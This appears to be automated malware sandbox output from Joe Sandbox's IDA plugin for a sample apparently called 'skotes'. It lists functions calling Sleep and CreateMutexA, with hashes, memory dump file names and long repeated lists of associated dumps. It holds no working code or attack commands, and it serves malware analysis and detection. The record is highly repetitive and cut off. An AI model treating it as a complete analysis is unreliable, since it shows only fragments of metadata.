Opcode ID: 38829bd6b9398c52b6fc029c3bdb231e8170c486e61b8d0f7c7098f87884b04f
Instruction ID: 30f1f17577b1f10883775bc4dbf7693b93cdbaecfa6ef0f2f6f825d2e0d2a820
Opcode Fuzzy Hash: 38829bd6b9398c52b6fc029c3bdb231e8170c486e61b8d0f7c7098f87884b04f
Instruction Fuzzy Hash: 653157317102849BEB18DBB9CD89B6DB772EFE2314F248219E014DB7D5CB76A9808752

Function 00AEA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 081414d163d7f6020a639624cc769cd46ced7234df8b8b4b45ebe7acd559bca9
Instruction ID: a7a48dfa6acbf4437d709a47c5648839e7c2bb865fed70a403eae7b464fbb726
Opcode Fuzzy Hash: 081414d163d7f6020a639624cc769cd46ced7234df8b8b4b45ebe7acd559bca9
Instruction Fuzzy Hash: 00314A317012809FEB189BBDDD897ADB772EFD6310F248219E014E73D5DB7569808752

Function 00AEA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f4c975572e715c747e8f3a29fa7b5750923be5a742973c90cd4b3bc34f526362
Instruction ID: c2d5a9f169f3823da61fcbd94e99b13ba839f6c6b4042f40a813560a6c0d4287
Opcode Fuzzy Hash: f4c975572e715c747e8f3a29fa7b5750923be5a742973c90cd4b3bc34f526362
Instruction Fuzzy Hash: B4318E317001808BEB18ABBDDD89B6DB7B2EFE1314F244218E414DB3D5DB7569C08752

Function 00AEA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9d3ac88c8e03355299c9d15b83f1135ce2d6ced65cf5aa1bba00836ad29aa748
Instruction ID: df20a3fd370ea428d3808690654f6587b71e98d30409c064c069337e974d99f2
Opcode Fuzzy Hash: 9d3ac88c8e03355299c9d15b83f1135ce2d6ced65cf5aa1bba00836ad29aa748
Instruction Fuzzy Hash: 71318B317012848BEB08DBBDCCC9B6DB762EFD2314F248219E414DB3D6CB75A9818762

Function 00AEA682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805265791.0000000000CF4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805288485.0000000000D09000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805306702.0000000000D0B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805323464.0000000000D0C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805341734.0000000000D0D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805361969.0000000000D0E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805379759.0000000000D14000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805400127.0000000000D15000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805421128.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805440417.0000000000D1E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805459158.0000000000D23000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805481482.0000000000D38000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805501727.0000000000D3C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805522435.0000000000D46000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805541280.0000000000D49000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805563809.0000000000D4A000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805581784.0000000000D50000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805602619.0000000000D51000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805620329.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805642101.0000000000D68000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805661314.0000000000D69000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805679555.0000000000D6B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805700959.0000000000D71000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805719543.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805741398.0000000000DB8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805797397.0000000000DCE000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805817094.0000000000DCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805837959.0000000000DE7000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805862352.0000000000DE8000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805882030.0000000000DE9000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805906340.0000000000DED000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805924417.0000000000DEF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805945795.0000000000DFD000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805965093.0000000000DFE000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_ae0000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 1a874a964ee2e5c973afaa0bea907706aa7c79b72f756f938c25c08d82a8ec86
Instruction ID: 80562b34c3bb0e024c2135ee0173e48dc3dc5adfb5096053f242ea1ff6be25c2
Opcode Fuzzy Hash: 1a874a964ee2e5c973afaa0bea907706aa7c79b72f756f938c25c08d82a8ec86
Instruction Fuzzy Hash: 13316D317002848BEB18DB79CDC576DB7B2DFD2314F248259E014DB3D6DB7569808792

Function 00AE9ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 00AEA963
CreateMutexA.KERNELBASE(00000000,00000000,00B43254), ref: 00AEA981

Memory Dump Source

Source File: 00000002.00000002.1804750908.0000000000AE1000.00000040.00000001.01000000.00000007.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000002.00000002.1804730516.0000000000AE0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804750908.0000000000B42000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804818038.0000000000B49000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804836483.0000000000B4B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804856699.0000000000B57000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804961703.0000000000CB6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1804980301.0000000000CB8000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805002014.0000000000CCF000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805025149.0000000000CD1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CD2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805044429.0000000000CDC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805087045.0000000000CDF000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805109547.0000000000CE0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805128420.0000000000CE2000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805148359.0000000000CE3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805167283.0000000000CE4000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805186865.0000000000CE5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805204810.0000000000CE6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805224345.0000000000CE7000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.1805246673.0000000000CEF000.00000080.00000001.01000000.00000007.sdmpDownload File
